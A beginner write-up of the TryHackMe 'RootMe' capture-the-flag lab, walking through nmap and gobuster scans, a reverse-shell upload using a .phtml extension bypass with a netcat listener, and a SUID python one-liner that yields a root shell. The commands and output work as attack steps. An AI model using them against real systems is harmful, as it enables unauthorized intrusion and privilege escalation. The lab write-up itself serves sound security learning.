Understanding CTF TryHackMe - RootMe

This guide walks you through a Capture The Flag (CTF) challenge designed for beginners. The goal is to gain root access to a system by following a series of steps involving reconnaissance, exploitation, and privilege escalation.

Key Points

Reconnaissance: Identify open ports and services.
Directory Enumeration: Use tools like gobuster to find hidden directories.
Exploitation: Upload a reverse shell to gain initial access.
Privilege Escalation: Identify and exploit SUID permissions to gain root access.

Reconnaissance

Start by scanning the target IP to identify open ports and services.

nmap -sV xx.xx.xxx.xx

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-15 09:41 GMT
Nmap scan report for 10.10.132.77
Host is up (0.00035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 02:18:D9:B2:7B:19 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

Key Findings:

Open Ports	Service	Version
22/tcp	ssh	OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp	http	Apache httpd 2.4.29

Directory Enumeration

Use gobuster to find hidden directories.

gobuster dir -u xx.xx.xxx.xx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Output:

Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 314] [--> http://10.10.132.77/uploads/]
/css                  (Status: 301) [Size: 310] [--> http://10.10.132.77/css/]
/js                   (Status: 301) [Size: 309] [--> http://10.10.132.77/js/]
/panel                (Status: 301) [Size: 312] [--> http://10.10.132.77/panel/]
/server-status        (Status: 403) [Size: 277]

Hidden Directory: /panel/

Getting a Shell

Navigate to http://xx.xx.xxx.xx/panel/ and upload a PHP reverse shell.

Set up a listener on your attack box:

nc -lvnp 4321

Upload the reverse shell:
- The .php extension is blocked. Use .phtml instead.
Reverse Shell Output:

Listening on 0.0.0.0 4321
Connection received on 10.10.132.77 36610
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 09:52:37 up 15 min,  0 users,  load average: 0.00, 0.19, 0.30
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Find the user flag:

find / -name "user.txt"

Output:

/var/www/user.txt

Flag:

cat /var/www/user.txt

THM{xxx}

Privilege Escalation

Identify files with SUID permissions to escalate privileges.

find / -user root -perm /4000

SUID, short for Set User ID, is a special authorization that can be assigned to executable files. When SUID authorization is enabled for an executable file, it allows users executing the file to temporarily assume the privileges of the file's owner.

Weird File: /usr/bin/python

Escalation Command:

./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Find the root flag:

find / -name "root.txt"

Output:

cat /root/root.txt

Flag:

THM{xxx}

Learn More

To further your understanding of CTF challenges and cybersecurity, consider exploring additional resources and practicing on platforms like TryHackMe and Hack The Box.